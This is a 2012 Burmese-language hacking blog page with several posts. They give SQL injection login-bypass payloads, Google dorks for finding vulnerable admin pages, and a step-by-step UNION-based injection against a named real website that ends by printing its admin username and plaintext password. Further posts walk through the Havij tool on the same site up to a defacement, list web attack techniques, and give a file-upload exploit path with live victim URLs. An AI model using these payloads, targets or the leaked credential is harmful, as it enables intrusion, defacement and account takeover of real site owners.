Username ေနရာမွာ ထည္႔မွာကေတာ႔ အဲဗား Admin လို႔ပဲ ထည္႔ပါမယ္...password ေနရာမွာေတာ႔ ဒါေလးေတြထဲက ၾကိဳက္တာေလးကို ထည္႔ေနာ္... :mrgreen:

Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
ဥပမာ -
username:Admin
password:'or'1'='1

ေပါ႔...

ကဲအဲဒါေတြထားလိုက္ေတာ့ ခု Sql injection တကယ္လုပ္ၾကည့္မယ္.....။ဘာလို႕ Sql injection က နာမည္ၾကီး
သလဲဆိုရင္ သူက Web Browser တစ္ခုသာလိုပါတယ္....။ပထမဆံုး sql vulnerability site တစ္ခုရွာရပါမယ္..။
ဘီဂင္နားေတြအတြက္ အခက္အခဲရိွတယ္ဆိုရင္ Sql Poizon ဆိုတဲ့ Tools ကိုသံုးႏိုင္ပါတယ္......။အသံုးျပဳနည္း
ကို ဒီကေန ဖတ္လိုက္ပါ...။Tool ကိုေဒါင္းခ်င္ရင္ .........။

ေအာက္ကေနေဒါင္းလိုက္ၾကပါ။


Mediafire
Ziddu
Ifile
password for Mediafire and Ifile ..............mmcracker 


ကၽြန္ေတာ္ကေတာ့ခုကၽြန္ေတာ့ေဘာ္ဒါ Hacker1989 ရွာထားတဲ့
sql vulnerability site ကိုပဲ ျပန္ျပီစမ္းျပပါမယ္။
နဲနဲသိတဲ့သူေတြကေတာ့ Sql Dork ေတြကို သံုးျပီ sql vulnerability site ရွာႏိုင္ပါတယ္........။Sql Dork ေတြကို ဒီမွာ ရွာေဖြႏိုင္ပါတယ္.....။ကၽြန္ေတာ့္ sql vulnerability site ေလးကေတာ့ ေအာက္ေဖာ္ျပပါျဖစ္ပါတယ္။

http://skdc-consultants.com/news_updates.php?id=27

ကဲခုစျပီးေဖာက္ၾကည့္ပါမယ္....။ကၽြန္ေတာ္ခုေရးတဲ့ Tutorial က လိုတိုရွင္းသာျဖစ္တဲ့အတြက္ ေမ့က်န္ခဲ့တာ ရိွရင္ ၾကိဳတင္ေတာင္းပန္ပါတယ္....။

ပထမဆံုးဆိုက္ကေပါက္ေနမေန စစ္ၾကည့္ရပါမယ္....။တစ္နည္းအားျဖင့္ အားနည္းခ်က္ အမွားမ်ား ရွာေဖြစစ္ေဆးၿခင္း ျဖစ္ပါတယ္.....။အဲဒီလိုစစ္မယ္ဆိုရင္ id variable assign လုပ္ထားတဲ႔ ေနာက္နားက( ') (apostrophe) ေလးတစ္ခုကုိ ထည့္လုိက္ပါမယ္..။
ဥပမာ...။
http://skdc-consultants.com/news_updates.php?id=27'

အကယ္၍ ၄င္းရဲ႕ site က vulnerable မၿဖစ္ဘူးဆုိရင္ ပုံမွန္အတုိင္း page loading လုပ္သြားပါလိမ့္မယ္..တစ္ကယ္လိုဆိုက္ကေပါက္ေနတယ္ဆိုရင္ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ဆိုတဲ့စာသားပဲျဖစ္ျဖစ္ Check the correct MySQL version သုိ႔မဟုတ္ MySQL Fetch error သုိ႔မဟုတ္ပါက ဘာမွမေပၚပဲ page အၿဖဴၾကီးသာေပၚေနပါလိမ့္မယ္
 ေအာက္မွာပံုနဲ႕ ျပထားတယ္..။



 ေနာက္တစ္ဆင့္အေနနဲ႔ column အေရအတြက္ကို ရွာရမွာျဖစ္ပါတယ္။အဲဒီလိုရွာမယ္ဆိုရင္ order by ဆိုတာ
ေလးကိုသံုးပါမယ္....
တစ္ဆင့္ခ်င္းရွာရမွာျဖစ္ပါတယ္. ..ကဲစရွာၾကည့္ရေအာင္...
URL ရဲ႕ေနာက္မွာ ဒါေလးေတြကိုသံုးရပါမယ္..(--)သို႕ (/*) ေအာက္မွာနမူနာပါ။

http://skdc-consultants.com/news_updates.php?id=27 order by 1--
ကၽြန္ေတာ္ဆက္တိုက္ရွာသြားပါ့မယ္......။
http://skdc-consultants.com/news_updates.php?id=27 order by 2--
http://skdc-consultants.com/news_updates.php?id=27 order by 3--
http://skdc-consultants.com/news_updates.php?id=27 order by 4--
http://skdc-consultants.com/news_updates.php?id=27 order by 5--
http://skdc-consultants.com/news_updates.php?id=27 order by 6--
http://skdc-consultants.com/news_updates.php?id=27 order by 7--
http://skdc-consultants.com/news_updates.php?id=27 order by 8--

ဒီမွာစျပီးအမွားေပၚလာပါျပီ... column 8 ခုမရိွလိုပါ.ဒါဆိုရင္ ဒီဆိုက္ရဲ႕ column အေရအတြက္ က 7 ခုျဖစ္ပါတယ္။ ေအာက္မွာပံုေလးနဲ႕ ျပထားပါတယ္......။


ကဲကၽြန္ေတာ္တို႕ဒီဆိုက္ေလးမွာ column 7 ခုရိွတယ္ဆိုတာသိသြားပါျပီ ဒါေပမယ့္ဘယ္ column မွာ Data ေတြ သိမ္းထားသလဲဆိုတာရွာရပါမယ္။ ဒီလိုရွာတဲ့ ေနရာမွာ union select all ဆိုတဲ့ statementေလးကိုအသံုးျပဳမွာပါ။
ဥပမာ ......။
http://skdc-consultants.com/news_updates.php?id=-27 union select all 1,2,3,4,5,6,7--

ဆိုျပီးျဖစ္ပါတယ္ သတိျပဳစရာေလးက Id နံပတ္ေလး 27 ရဲ႕ ေရွ႕မွာ (-) ထည့္ေပးရမွာပါ..။ေအာက္မွာပံုေလး
နဲ႔ျပထားတယ္။


ကဲဘာကိုေတြ႕လဲဆိုေတာ့ data ေတြသိမ္းထားတဲ့ column နံပတ္ကိုေတြ႕ရမွာပါ ....နံပတ္ (2)ပါ ေသျခာမွတ္
သားထားပါ.....။ဘာလို႕လဲဆိုေတာ့ ဒါေလးနဲ႕ေနာက္ထပ္ဆက္ျပီးခရီးသြားရမွာပါ။

ေနာက္တစ္ဆင့္အေနနဲ႕  MySQL Version ကိုရွာရမွာပါ။ ခုနက Data သိမ္းတားတဲ့ column ေနရာမွာ @@version ဆိုတဲ့ statement ေလးကိုသံုးရပါမယ္....။နံပတ္ (2) ေနရာမွာေပါ့.။ကၽြန္ေတာ့္ ဒီ tutorial ေလးက
နံပတ္ (၂)မွာ ေတြရလို႕ပါ...။တျခားမွာေတြ႕ရင္ လည္းသင့္သလို အသံုးျပဳပါ.....။
ဥပမာ........။
http://skdc-consultants.com/news_updates.php?id=-27 union select all 1,@@version,3,4,5,6,7--
ကၽြန္ေတာ္ေရးထားတာၾကည့္ပါ (2) ေနရာမွာ (@@version) ကိုသံုးထားပါတယ္.......။ေအာက္မွာပံုေလးျပ
ထားပါတယ္...။

MySQL version ကို ကၽြန္ေတာ္တို႕သိလိုက္ရပါျပီ။ version 5.0.77 ျဖစ္ပါတယ္.....။ version 5 ႏွင့္အထက္ဆို
ေအာက္ပါအတိုင္းဆက္လုပ္ႏိုင္ပါတယ္.....။version 4 တြက္ကၽြန္ေတာ္ေနာက္ေတာ့မွဆက္ေရးပါ့မယ္...။သိပ္ မအားလို႕ပါ.....။
MySQL version 5 မွာ information_schema ဆုိတဲ႔ အသုံး၀င္တဲ႔ funtion တစ္ခုပါ၀င္ၿပီး ၄င္းက လက္ရွိ DB server ရဲ႕ tables နဲ႔ columns ေတြကုိ ထိန္းသိမ္းထားတာၿဖစ္ပါတယ္...
Tables ေတြကုိရယူရန္ table_name from information_schema.tables ဆုိတာကုိသုံးသလုိ
Columns ေတြကုိရယူရန္ column_name from information_schema.columns ဆုိတာကုိသုံးရပါမယ္..    

ကဲေနာက္တစ္ဆင့္အေနနဲ႕ table name ေတြကိုဆက္ရွာပါ့မယ္.....။အဲဒီလိုရွာမယ္ဆိုရင္ ေအာက္ပါ statement
ကိုသံုးရပါမယ္........။(group_concat(table_name)) ကိုသံုးရမွာပါ ...ေနာက္ျပီး URL ၇ဲ႕ေနာက္ကေနျပီးေတာ့
table_name from information_schema.tables ဆိုတာေလးကိုသံုးရမွာပါ......။ဥပမာေအာက္မွာၾကည့္ပါ...
http://skdc-consultants.com/news_updates.php?id=-27 union select all 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--
ေအာက္ကလင့္ပါ.....။


ေသျခာမွတ္ထားပါ အေရးၾကိးလာပါျပီ......။ေအာက္မွာျပထားတဲ့ပံုေလးကိုၾကည့္ပါ......။

 သိပ္ေတာ့ရႈပ္မသြားေသးပါဘူးေနာ္  ....တစ္ဆင့္ျခင္းစိတ္ရွည္ရွည္ထားပါ...။ကဲျပန္ၾကည့္ရေအာင္ အတက္
ကပံုးေလးကို အဲဒီမွာ Data ေတြသိမ္းထားတဲ့ table name ေတြေပၚလာပါျပီ..။ကၽြန္ေတာ္တို႕လိုခ်င္တာက 
admin ရဲ႕ အခ်က္အလက္ပါ.....။ဒါေၾကာင့္ ညဏ္ေလးလႊာသံုးၾကည့္လိုက္ေတာ့ tbl_admin ဆိုတဲ့ဟာေလးကို
သြားေတြ႕ပါတယ္.....။ေသျခာပါတယ္..အဲဒီ table မွာလိုခ်င္တာေတြရိွမွာပါ.......။
ေနာက္ထပ္Table name အခ်ိဳ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.

ေနာက္တစ္ဆင့္ အေနနဲ႔ column name ေတြကိုရွာရမွာပါ......။ထံုးစံအတိုင္းပဲ statement ေတြသံုးရမွာပါ....
ဒီတစ္ခါဒီလိုေလးသံုးၾကည့္မယ္......။ group_concat(column_name) နဲ႕ URL ေနာက္က column_name from information_schema.columns ဆိုတာေလးေတြသံုးမယ္.....မမွားပါေစနဲ႕ေတာ့ ရေတာ့မွာပါ........။အဆံုးသတ္
ပိုင္းေရာက္ေတာ့မယ္....။ေအာက္မွာဥပမာေပးထားတယ္....။
http://skdc-consultants.com/news_updates.php?id=-27 union select all 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--


ေအာက္ကပံုေလးကိုေသျခာၾကည့္လိုက္ပါ.......။

အဲဒီမွာ admin_name နဲ႕ admin_password ဆိုတဲ့ column name ေတြကိုေတြ႕ရမွာပါ။ေဟျခာမွတ္သားထားပါ..။
ဒီဆိုက္၇ဲ႕ admin name နဲ႕ password ေတြအဲဒီ column ေအာက္မွာရိွပါတယ္....။ကၽြန္ေတာ္တို႕ နည္းနည္း
ျပန္ေကာက္ၾကည့္မယ္ဆိုရင္ table Name (tbl_admin) , column (admin_name,admin_password) ေတြေအာက္
ကေန admin user name နဲ႕ password ေတြကို သမၾကရေအာင္ဗ်ာ......။
ေနာက္ဆံုးအဆင့္အေနနဲ႕ ထံုးစံအတိုင္း statement ေတြျပန္သံုးၾကည့္မယ္.......။(0x3a) ကိုသံုးပါ့မယ္........။
ဥပမာအရင္ျပပါ့မယ္.......။
http://skdc-consultants.com/news_updates.php?id=-27 union select all 1,group_concat(admin_name,0x3a,admin_password),3,4,5,6,7 from tbl_admin--

အထက္ေဖၚျပပါဥပမာကိုၾကည့္မယ္ဆိုရင္ tbl_admin ဆိုတဲ့ table ကေန column ေတြျဖစ္တဲ့ admin_name နဲ႕
admin_password ကData ေတြရယူလိုက္တာပါ...။
ကဲအရမး္မိုက္တာေလးလာပါျပီေအာက္ကပံုးေလးကိုၾကည့္ပါ.......။




ကဲလာျပီပါျပီ ေနာက္ဆံုး result အေနနဲ႕  admin:M#14n29m1 ဆိုတာေလးပါ....။ကဲရွင္းပါတယ္..။admin ဆို
တာ login name ျဖစ္ျပီး M#14n29m1 ဆိုတာ password ျဖစ္ပါတယ္....။

user: admin
password: M#14n29m1
ေပါ့...Happy Hacker ေပါ့......။
ဒါေတြသိသြားေပမယ့္လဲ admin login page မသိေသးပဲနဲ႔ ဘာမွလုပ္မရဘူးဗ်... ဘီဂင္းနားေတြအေနနဲ႕ 
admin page finder အစရိွတဲ့ Tool ေတြနဲ႕ ရွာေဖြႏိုင္ပါတယ္......။
ဒီဆိုက္ေလးရဲ႕ admin page ကေတာ့ ..........
ျဖစ္ပါတယ္။

ေပွ်ာ္ရႊင္ေသာေန႕သစ္ျဖစ္ပါေစ......
ဆုေတာင္းေပးလွ်က္.....
http://shwekoyantaw.blogspot.com
Read More ->>

Sunday, March 25, 2012

sql injection with tool(havij) tutorial



sql injection with tool(havij) tutorial ပါ...ပထမဆံုး ကၽြန္ေတာ္တို႔လိုအပ္တာကေတာ႔ Havij ပါ...download ဆြဲျပီး extract လုပ္ထားပါ...register လုပ္လုပ္ မလုပ္လုပ္ ဒီ Tutorial မွာ ျပႆနာမရွိပါဘူး...ကၽြန္ေတာ္ unregistered အေနနဲ႔ပဲျပပါမယ္...ဒါက တစ္ပိုင္း...
ေနာက္တစ္ခု sql vulnerability site ကိုရွာပါမယ္...ဘာနဲ႔ရွာမလဲ??? ဒီေနရာ က sql injection dork list ကိုသံုးျပီးရွာႏိူင္ပါတယ္...ဒါမွမဟုတ္ Sql Poizon ကိုသံုးျပီးရွာပါမယ္...
ဒီလိုဆို ကၽြန္ေတာ္တို႔ link ေတြရလာျပီဆိုပါစို႔....ကၽြန္ေတာ္တစ္ဆိုဒ္ကိုေရြးလိုက္ပါမယ္...ကၽြန္ေတာ္နဲ႔ bro $n1ff3rg0d နဲ႔ သတင္း၀င္ေရးခဲ႔ဖူးေသးတဲံ႔ http://skdc-consultants.com/news_updates.php?id=27 ဆိုတာေလးကို ေရြးလိုက္ပါမယ္....အိုေက...ဒီလိုဆို ကၽြန္ေတာ္တို႔ target ရပါျပီ...sql စထိုးပါမယ္..

ေစာေစာက extract လုပ္ထားတဲ႔ havij ကို install လုပ္စရာေတာင္ မလိုပါဘူး... double click နဲ႔ run လုိက္ပါ...target ဆိုတဲ႔ ေနရာမွာ 
http://skdc-consultants.com/news_updates.php?id=27
ဆိုတဲ႔ vulnerability link အျပည္႔အစံုထည္႔ျပီး analyze ကို ႏွိပ္လိုက္ပါ.. Bumb သိပ္ေတာင္မၾကာလိုက္ဘူးဗ်ာ...current db ရပါျပီ... 


Tables ကို ႏွိပ္ပါ... Get Tables ကို ဆက္ႏွိပ္ပါ... ရျပန္ပါျပီဗ်ာ... :mrgreen:


အိုေက...ကၽြန္ေတာ္တို႔ column ဆက္ရွာပါမယ္...ဘယ္ column ကိုရွာရမတုန္း ဆိုရင္ admin ရဲ႔ username နဲ႔ password ရွိႏိူင္မယ္႔ table ထဲက column ကိုဆက္ရွာရမွပါ...ဒီ tutorial မွာဆိုရင္ေတာ႔ admin username/password ဘယ္မွာရွိမွာတုန္း??? :?: :?: :?: ... ရွင္းပါတယ္... tbl admin ဆိုတာေလးထဲမွာရွိမွာေပါ႔ဗ်....ဟုတ္ဖူးလား :mrgreen: :mrgreen: :mrgreen: tbl_admin ဆိုတာေလးကို အမွန္ျခစ္ေလးထည္႔ျပီးေတာ႔ Get Columns ဆိုတာကို ဆက္ႏွိပ္ပါ...ေတြ႔ပါျပီဗ်ာ.... admin_name နဲ႔ admin_password နဲ႔ ...


admin_name နဲ႔ admin_password ကို အမွန္ျခစ္ေလးထည္႔ျပီးေတာ႔ Get Data ကို ဆက္ႏွိပ္ပါ...
80% ေအာင္ျမင္ျပီလို႔ ေျပာလို႔ရပါျပီ....admin panel ရွာဖို႔နဲ႔ နဲ႔ password decrypt လုပ္ထားရင္ password hash ကို ေျဖဖို႔က်န္ပါေသးတယ္... save data နဲ႔ျဖစ္ျဖစ္ save tables နဲ႔ျဖစ္ျဖစ္ username နဲ႔ password ကို save ထားလိုက္ပါ...



အိုေက.....password လည္း hash နဲ႔မဟုတ္ေတာ႔ admin page ရွာဖို႔ပဲက်န္ပါေတာ႔တယ္... find admin ကို ႏွိပ္လိုက္ပါ... path to search မွာ site url ကို ထည္႔ပါ... start ကို ႏွိပ္ပါ... ခဏေစာင္႔ပါ...admin page ရွာေတြ႔ရင္ admin page found ဆိုျပီးေပၚလာပါလိမ္႔မယ္... ေတြ႔ပါျပီဗ်ာ...



admin panel url ကိုသြားျပီး admin username / password နဲ႔ login ၀င္လိုက္ပါ... Glad
Bump!GameOver.
Enjoy! balls
uploaded my deface page! Glad

http://www.skdc-consultants.com/news_updates.php?id=2



source by mmhackforums.noonhost.com.../
ပံုမ်ားမရွင္းပါက ကလစ္ေထာက္ျပီးၾကည့္ပါ။
Read More ->>

Wednesday, March 21, 2012

List of Webs Hacking Techniques



This list below fits in category Parameter manipulation

အဒီထဲကတေကာင္ေကာင္ကို Googling လိုက္ေနာ္

Arbitary File Deletion
Code Execution
Cookie Manipulation ( meta http-equiv & crlf injection )
CRLF Injection ( HTTP response splitting )
Cross Frame Scripting ( XFS )
Cross-Site Scripting ( XSS )
Directory traversal
Email Injection
File inclusion
Full path disclosure
LDAP Injection
PHP code injection
PHP curl_exec() url is controlled by user
PHP invalid data type error message
PHP preg_replace used on user input
PHP unserialize() used on user input
Remote XSL inclusion
Script source code disclosure
Server-Side Includes (SSI) Injection
SQL injection
URL redirection
XPath Injection vulnerability
EXIF



This list below fits in category MultiRequest parameter manipulation

Blind SQL injection (timing)
Blind SQL/XPath injection (many types)



This list below fits in category File checks

8.3 DOS filename source code disclosure
Search for Backup files
Cross Site Scripting in URI
PHP super-globals-overwrite
Script errors ( such as the Microsoft IIS Cookie Variable Information Disclosure )



This list below fits in category Directory checks

Cross Site Scripting in path
Cross Site Scripting in Referer
Directory permissions ( mostly for IIS )
HTTP Verb Tampering ( HTTP Verb POST & HTTP Verb WVS )
Possible sensitive files
Possible sensitive files
Session fixation ( jsessionid & PHPSESSID session fixation )
Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
WebDAV ( very vulnerable component of IIS servers )



This list below fits in category Text Search Disclosure

Application error message
Check for common files
Directory Listing
Email address found
Local path disclosure
Possible sensitive files
Microsoft Office possible sensitive information
Possible internal IP address disclosure
Possible server path disclosure ( Unix and Windows )
Possible username or password disclosure
Sensitive data not encrypted
Source code disclosure
Trojan shell ( r57,c99,crystal shell etc )
( IF ANY )Wordpress database credentials disclosure



This list below fits in category File Uploads

Unrestricted File Upload



This list below fits in category Authentication

Microsoft IIS WebDAV Authentication Bypass
SQL injection in the authentication header
Weak Password
GHDB - Google hacking database ( using dorks to find what google crawlers have found like passwords etc )



This list below fits in category Web Services - Parameter manipulation & with multirequest

Application Error Message ( testing with empty, NULL, negative, big hex etc )
Code Execution
SQL Injection
XPath Injection
Blind SQL/XPath injection ( test for numeric,string,number inputs etc )
Stored Cross-Site Scripting ( XSS )
Cross-Site Request Forgery ( CSRF )

က်ေနာ္သိသေလာက္ေလးပါခင္ဗ်..တျခားရွိေသးရင္မွ်က်ပါဦး...က်ေနာ့္ အရင္က Webs hacking Technique ေယာင္လည္လည္ျဖစ္ခဲ့လို႔..ေနာင္လာေနာက္သားေတြမျဖစ္ေအာင္ဆိုပီး ဟီးးးးးးးးးးးးး(နာေတာင္န္ည္းနည္းလဲပဲသိေသးတယ္..ခိခိ)

post By dr.c0mpl3x
copy from mmhackforums.noonhost.com 
Read More ->>

Saturday, March 17, 2012

"Tmedit Popuop" Deface and Shell upload vulnerability



Dork: inurl:/editor/tmedit/popups
Exploit Path : /editor/tmedit/popups/InsertFile/insert_file.php

Search This Dork in google........  Dork: inurl:/editor/tmedit/popups



You must be choice one URL from result.........
Now you can upload your file.........

Live Demo
http://www.arabicthailand.com/editor/tmedit/popups/insert_image_en.php
http://www.masjidklangchachengsao.com/editor/tmedit/popups/InsertFile/insert_file.php

Result
http://www.arabicthailand.com/images/backlinks.html
http://www.masjidklangchachengsao.com/uploadfiles/backlinks.html
Read More ->>

..::Sql poizon v1.1 tutorial::..

sql poizon ကို သံုးျပီး sql vulnerable website ေတြကို ရွာသြားပါမယ္...ပထမဦးဆံုး sql poizon ကို ဒီေအာက္က link ေလးမွာ download ဆြဲပါ...အဲထဲမွာ sql vulnerability links ေတြအမ်ားၾကီးပါျပီးသားဗ်...ယူဆြဲရံုပဲ...ဒါေပမယ္႔ sql poizon သံုးနည္းကိုလည္း သိထားသင္႔ၾကတယ္ ထင္လို႔-------------

http://mmhackforums.noonhost.com/viewtopic.php?f=9&t=239


ေဆးထိုးအပ္ပံုၾကီးနဲ႔ sql poizon ကို run လိုက္ပါ...ဒီလိုမ်ိဳးေလးျမင္ရမယ္ ဟုတ္တယ္ ဟုတ္??







all dorks ဆိုတာေလးနားက + ေလးကို click ျပီးေတာ႔ dork ေရြးေပးရပါမယ္...ကၽြန္ေတာ္ php dork ထဲကတစ္ခုကို ေရြးထားပါတယ္...ေရြးျပီးရင္ scan ကို ႏွိပ္ပါ...ဒီေအာက္ကပံုေလးအတိုင္းပဲ result ေတြထြက္လာပါလိမ္႔မယ္...





အိုေက....အခု scan ျပီးသြားရင္ ဒီထြက္လာတဲ႔ေကာင္ေတြကို sql crawler ထဲထည္႔ဖို႔လိုတယ္ဗ်... right click ေထာက္ျပီး send to sql crawler ကိုေရြးပါ...all ကို ေရြးပါ...








ကဲ...sql crawler tab ပြင္႔သြားပါလိမ္႔မယ္...အဲ website ေတြဟာ တကယ္ vulnerability ျဖစ္မျဖစ္ သိဖို႔အတြက္ crawl ကို ႏွိပ္ပါ...






Vulnerability Links ေတြထြက္လာပါျပီ...Export Results ကို ႏွိပ္ျပီး ေတာ္သင္႔ရာေနရာမွာ save ထားလိုက္ေတာ႔ေပါ႔ဗ်ာ...ေနာက္မွ အားရင္ အားသလို Injection ေပါ႔....

Not for pro...Just for n00bs,dummies. :mrgreen: :mrgreen: :mrgreen:
Enjoy!
 post by hacker 1989
source from mmhackforums.noonhost.com





;)
Read More ->>

<---Manual Sql Tutorial[Bypassing Admin Login]--->(Part 1)


hacker 1989 ေရးတဲ့ Tutorial ေလးပါ။ေနာက္လဲသူ႕ဆီကရရင္ထပ္တင္ေပးပါ့မယ္။ကၽြန္ေတာ္ကသူ႕ေလာက္
မေရးတတ္လို႔ပါ.....ဟဲဟဲ....။mmhackforums.noonhost.com မွာလဲတင္ထားပါတယ္။

စမယ္.....
လြယ္ပါတယ္...ဒီ တစ္ဆင္႔ကေတာ႔ Easy ပါ...သိပ္မၾကာခင္မွာ part2 ဆက္ေရးေပးမယ္... :mrgreen:

ဒါက basic sql injection အတြက္ အေကာင္းဆံုး dork ေတြပါ...

Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
 
ထြက္လာတဲ႔ result ေတြထဲက ၾကိဳက္တာ click ေထာက္ပါ...
ADMIN USERNAME :
PASSWORD :
ဆိုျပီး ဒီလိုမ်ိဳးေတာင္းတာေလးေတြ ေတြ႔ရပါလိမ္႔မယ္... :mrgreen:

Username ေနရာမွာ ထည္႔မွာကေတာ႔ အဲဗား Admin လို႔ပဲ ထည္႔ပါမယ္...password ေနရာမွာေတာ႔ ဒါေလးေတြထဲက ၾကိဳက္တာေလးကို ထည္႔ေနာ္... :mrgreen:  

Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
 
ဥပမာ -
username:Admin
password:'or'1'='1

ေပါ႔...
Enjoy! :mrgreen:
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology